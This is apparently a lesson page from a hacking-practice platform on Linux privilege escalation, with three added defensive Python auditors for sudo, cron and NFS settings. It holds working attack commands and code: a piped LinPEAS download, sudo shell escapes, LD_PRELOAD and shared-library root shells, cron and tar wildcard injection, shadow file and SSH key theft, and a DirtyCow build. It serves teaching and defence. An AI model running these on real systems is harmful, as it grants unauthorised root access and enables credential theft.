Linux PrivEsc

Difficulty: intermediate | Duration: 1h 30m

Practice Linux privilege escalation

Learning Objectives

  • Multiple privesc vectors
  • Kernel exploits
  • SUID exploitation
  • Cron job abuse

Linux Privilege Escalation is the art of going from a low-privileged user to root. This room covers the essential techniques every pentester needs: SUID binaries, sudo misconfigurations, cron jobs, kernel exploits, and more!

Privilege escalation is like being invited to a party but wanting access to the VIP room. You're already inside - now you need to convince the bouncer (the kernel) that you belong in the restricted area!

Initial Enumeration

# System Information
hostname
uname -a                 # Kernel version (for exploits)
cat /etc/issue           # Distribution info
cat /etc/os-release

# User Information
whoami
id                       # Groups can reveal access
cat /etc/passwd          # All users
cat /etc/shadow          # Password hashes (if readable!)

# Network Information
ip addr                  # or ifconfig
netstat -antup           # Listening services
ss -tulpn                # Modern alternative

# Running Processes
ps aux                   # All processes
ps aux | grep root       # Root processes

LinPEAS

Run LinPEAS for automated enumeration. It checks the categories covered in this room (and many more) and highlights findings in color. Download it from GitHub and run:

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

On a client engagement, fetch the script first and review it rather than piping it straight into a shell.

Sudo Exploitation

# Check sudo permissions
sudo -l

# Common exploitable entries:

# 1. Run anything as root
(root) NOPASSWD: ALL
sudo su -

# 2. Specific binary (check GTFOBins!)
(root) NOPASSWD: /usr/bin/vim
sudo vim -c ':!/bin/bash'

# 3. Environment variables
env_keep+=LD_PRELOAD
# Create malicious shared library (see below)

# 4. Shell escapes
(root) NOPASSWD: /usr/bin/less /var/log/*
sudo less /var/log/syslog
!/bin/bash

# GTFOBins quick reference:
# vim: :!/bin/bash
# less/more: !/bin/bash
# find: -exec /bin/bash \;
# nmap: --interactive then !sh (old versions)
# awk: BEGIN {system("/bin/bash")}
# python: import os; os.system("/bin/bash")

# LD_PRELOAD Exploitation
# If sudo has: env_keep+=LD_PRELOAD

# Create malicious shared library:
cat > /tmp/shell.c << 'EOF'
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setgid/setuid prototypes */

void _init() {
    unsetenv("LD_PRELOAD");   /* do not re-inject into the child shell */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
EOF

gcc -fPIC -shared -nostartfiles -o /tmp/shell.so /tmp/shell.c
sudo LD_PRELOAD=/tmp/shell.so /usr/bin/allowed_binary
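A defender-side counterpart to the sudo -l checks above, added here as an example and not part of the room: a small Python auditor that parses sudo -l output and flags the patterns just listed (NOPASSWD ALL, binaries with GTFOBins shell escapes, argument wildcards, and env_keep of LD_PRELOAD). The sample output, host name and user name are constructed.

```python
import re

# Binaries from the GTFOBins quick reference above that offer a shell escape.
SHELL_ESCAPE_BINARIES = {"vim", "less", "more", "find", "nmap", "awk", "python", "python3"}
# Variables that, when kept across sudo, let the caller load code into the root process.
DANGEROUS_ENV_KEEP = ("LD_PRELOAD", "LD_LIBRARY_PATH")
# One rule as `sudo -l` prints it: "(runas) TAG: command args"; the tag part is optional.
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def audit_sudo_l(output: str) -> list:
    """Return (category, detail) pairs for every risky entry in `sudo -l` text."""
    findings = []
    for raw in output.splitlines():
        line = raw.strip()
        if "env_keep" in line:
            # Defaults line such as "env_reset, env_keep+=LD_PRELOAD, ..."
            for var in DANGEROUS_ENV_KEEP:
                if re.search(rf"\b{var}\b", line):
                    findings.append(("env_keep", var))
            continue
        m = RULE_RE.match(line)
        if not m:
            continue  # headers like "User alice may run ..." and blank lines
        cmd = m.group("cmd").strip()
        tag = "NOPASSWD" if "NOPASSWD:" in m.group("tags") else "PASSWD"
        if cmd == "ALL":
            findings.append(("all", f"{tag} ALL as ({m.group('runas')})"))
            continue
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if binary in SHELL_ESCAPE_BINARIES:
            findings.append(("shell_escape", f"{tag} {binary}"))
        if "*" in cmd:
            # sudoers argument wildcards match across spaces and slashes: broader than it looks
            findings.append(("wildcard_arg", cmd))
    return findings


# Constructed `sudo -l` output for the demonstration; not captured from a real host.
SAMPLE_SUDO_L = """\
Matching Defaults entries for alice on web01:
    env_reset, env_keep+=LD_PRELOAD, secure_path=/usr/sbin:/usr/bin:/sbin:/bin

User alice may run the following commands on web01:
    (root) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/less /var/log/*
    (root) NOPASSWD: /usr/bin/systemctl restart nginx
"""
if __name__ == "__main__":
    for category, detail in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"[{category}] {detail}")
```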

SUID Exploitation

# Find SUID binaries
find / -perm -u=s -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null

# Find SGID binaries
find / -perm -g=s -type f 2>/dev/null

# Common SUID exploits:

# Custom/unusual SUID binary
# Analyze with strings, ltrace, strace

# SUID copy of bash
/usr/bin/bash_copy -p

# nmap (old interactive mode)
nmap --interactive
!sh

# find
find . -exec /bin/bash -p \; -quit

# vim
vim -c ':py import os; os.execl("/bin/bash", "bash", "-p")'
SUID binaries run with owner's permissions (usually root). A vulnerable SUID binary is an instant privesc vector!
# Shared Library Hijacking
# If SUID binary loads library from writable path

# Check library dependencies
ldd /usr/local/bin/suid-binary

# Check library search order
strace /usr/local/bin/suid-binary 2>&1 | grep open

# If it tries to load from writable directory:
cat > /tmp/libcustom.c << 'EOF'
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* setuid prototype */

/* runs automatically when the library is loaded */
static void inject() __attribute__((constructor));

void inject() {
    setuid(0);
    system("/bin/bash -p");
}
EOF

gcc -shared -fPIC -o /path/to/writable/libcustom.so /tmp/libcustom.c

Cron Job Exploitation

# View cron jobs
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
cat /var/spool/cron/crontabs/*

# Monitor processes for cron (pspy tool)
./pspy64

# Exploitation scenarios:

# 1. Writable cron script
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /path/to/cron/script.sh
# Wait for cron, then:
/tmp/bash -p

# 2. PATH manipulation
# If cron runs: script.sh (without full path)
# And PATH=/home/user:...
echo '/bin/bash' > /home/user/script.sh
chmod +x /home/user/script.sh

# 3. Wildcard injection (tar)
# Cron: cd /dir && tar czf backup.tar.gz *
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /dir/shell.sh
touch /dir/--checkpoint=1
touch '/dir/--checkpoint-action=exec=sh shell.sh'   # one file name, so quote it
Cron jobs run as their owner (often root). If you can modify what they execute, you inherit their privileges!
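An added example (not part of the room): a Python check that reads an /etc/crontab-style file and flags the three scenarios above, a job script that is writable by unprivileged users, a command resolved through a PATH containing a user-controlled directory, and a tar invocation over a wildcard. The crontab contents and the writable-path set are constructed for the demonstration.

```python
import re

# A system crontab entry: five time fields (or an @shortcut), the user, then the command.
JOB_RE = re.compile(r"^(?:@\w+|(?:\S+\s+){4}\S+)\s+(?P<user>\S+)\s+(?P<cmd>.+)$")
SHELL_BUILTINS = {"cd", "export", "exec", "umask", "set"}  # never resolved through PATH


def audit_crontab(text: str, world_writable=frozenset()) -> list:
    """Flag the three cron abuse scenarios in /etc/crontab-style text.
    `world_writable` holds paths the caller already found writable by unprivileged
    users (e.g. with find -writable); passing it in keeps the function offline."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if re.match(r"^[A-Za-z_]\w*=", line):  # environment assignment such as PATH=
            key, _, value = line.partition("=")
            if key == "PATH":
                for d in value.strip('"').split(":"):
                    if d in world_writable or not d.startswith("/") or d.startswith(("/home/", "/tmp")):
                        findings.append(("path_dir", d))
            continue
        m = JOB_RE.match(line)
        if not m:
            continue
        user = m.group("user")
        # Inspect each simple command of a pipeline / && chain separately.
        for simple in re.split(r"&&|\|\||;|\|", m.group("cmd")):
            argv = simple.split()
            if not argv:
                continue
            prog = argv[0]
            if prog in world_writable:
                findings.append(("writable_script", f"{user}: {prog}"))
            if "/" not in prog and prog not in SHELL_BUILTINS:
                findings.append(("relative_command", f"{user}: {prog}"))
            if prog.rsplit("/", 1)[-1] == "tar" and "*" in argv[1:]:
                # tar parses file names such as --checkpoint-action=... as options
                findings.append(("tar_wildcard", f"{user}: {simple.strip()}"))
    return findings


# Constructed /etc/crontab and writable-path set for the demonstration.
SAMPLE_CRONTAB = """\
PATH=/home/user:/usr/local/sbin:/usr/sbin:/usr/bin:/sbin:/bin
*/5 * * * * root /opt/backup/script.sh
*/10 * * * * root script.sh
0 2 * * * root cd /dir && tar czf backup.tar.gz *
@daily root /usr/bin/apt-get update
"""
WORLD_WRITABLE = frozenset({"/opt/backup/script.sh"})
```

Running `audit_crontab(SAMPLE_CRONTAB, WORLD_WRITABLE)` reports the writable script, both commands resolved via PATH (script.sh and tar), the /home/user PATH entry and the tar wildcard, while the absolute apt-get job passes.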

Capabilities

# Find binaries with capabilities
getcap -r / 2>/dev/null

# Dangerous capabilities:
# CAP_SETUID - change UID
# CAP_SETGID - change GID
# CAP_DAC_READ_SEARCH - bypass file read and directory search permission checks
# CAP_DAC_OVERRIDE - bypass read, write and execute permission checks
# CAP_NET_BIND_SERVICE - bind to ports < 1024

# Python with cap_setuid
/usr/bin/python3 = cap_setuid+ep
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# tar with cap_dac_read_search
tar -cvf shadow.tar /etc/shadow
tar -xvf shadow.tar      # extracts a readable copy to ./etc/shadow

Password Hunting

# Configuration files
grep -r "password" /var/www/ 2>/dev/null
grep -r "pass" /etc/ 2>/dev/null
find / -name "*.config" -exec grep -l "password" {} \; 2>/dev/null

# History files
cat ~/.bash_history
cat ~/.mysql_history
cat ~/.nano_history

# SSH keys
find / -name "id_rsa" 2>/dev/null
find / -name "*.pem" 2>/dev/null
cat ~/.ssh/id_rsa

# Database files
cat /var/www/html/config.php
cat /var/www/html/wp-config.php

# Shadow file (if readable)
cat /etc/shadow
# Crack with john:
john --wordlist=rockyou.txt shadow.txt

Kernel Exploits

# Get kernel version
uname -r
cat /proc/version

# Search for exploits
searchsploit linux kernel 4.4.0
searchsploit linux kernel ubuntu

# Famous kernel exploits:
# - DirtyCow (CVE-2016-5195) - Linux < 4.8.3
# - DirtyPipe (CVE-2022-0847) - Linux 5.8+
# - PwnKit (CVE-2021-4034) - pkexec

# DirtyCow example
searchsploit -m linux/local/40839.c
gcc -pthread 40839.c -o dirty -lcrypt
./dirty

# Use linux-exploit-suggester
./linux-exploit-suggester.sh
Kernel exploits can crash systems! Always have permission and a backup plan. Use them as a last resort after other methods fail.

NFS Misconfiguration

# Check NFS exports
cat /etc/exports
showmount -e TARGET_IP

# Look for no_root_squash
# This means root on client = root on server!

# Exploitation (from attacker):
mount -o rw,vers=2 TARGET_IP:/share /tmp/mount
cd /tmp/mount
cp /bin/bash .
chmod +s bash

# On target:
/share/bash -p
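Added here as an example (not part of the room): a parser for /etc/exports that reports no_root_squash and world-writable exports, including the easily missed form where a space before the option list makes those options apply to every client. The sample exports file is constructed.

```python
import re

# One client spec in /etc/exports: "<client>(<options>)". An empty client part
# (a stray space before the parenthesis) means the options apply to everyone.
CLIENT_RE = re.compile(r"(?P<client>[^\s(]*)\((?P<opts>[^)]*)\)")


def audit_exports(text: str) -> list:
    """Return (severity, path, client, issue) for exports that hand root to NFS clients."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line:
            continue
        path, clients = (line.split(None, 1) + [""])[:2]
        for m in CLIENT_RE.finditer(clients):
            client = m.group("client") or "*"
            opts = {o.strip() for o in m.group("opts").split(",") if o.strip()}
            # root_squash is the default, so no_root_squash only appears when someone enabled it.
            if "no_root_squash" in opts:
                severity = "high" if "rw" in opts else "medium"
                findings.append((severity, path, client, "no_root_squash"))
            if "rw" in opts and client == "*":
                findings.append(("medium", path, client, "world-writable export"))
    return findings


# Constructed /etc/exports for the demonstration; not copied from any real server.
SAMPLE_EXPORTS = """\
/share        *(rw,sync,no_root_squash)   # the misconfiguration shown above
/srv/backup   10.0.0.0/24(rw,sync)
/srv/pub      *(ro,sync)
/srv/oops     10.0.0.5 (rw)
"""

if __name__ == "__main__":
    for severity, path, client, issue in audit_exports(SAMPLE_EXPORTS):
        print(f"{severity:6} {path} {client}: {issue}")
```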

Knowledge Check

Quick Quiz
Question 1 of 2

What does the -p flag do with a SUID bash binary?

Key Takeaways

  • Always start with sudo -l - it's the quickest win
  • SUID binaries with shell escapes are instant root
  • Cron jobs running writable scripts = code execution as cron's user
  • Capabilities can be as powerful as SUID
  • GTFOBins is your bible for sudo/SUID exploitation
  • Kernel exploits are last resort - risky but effective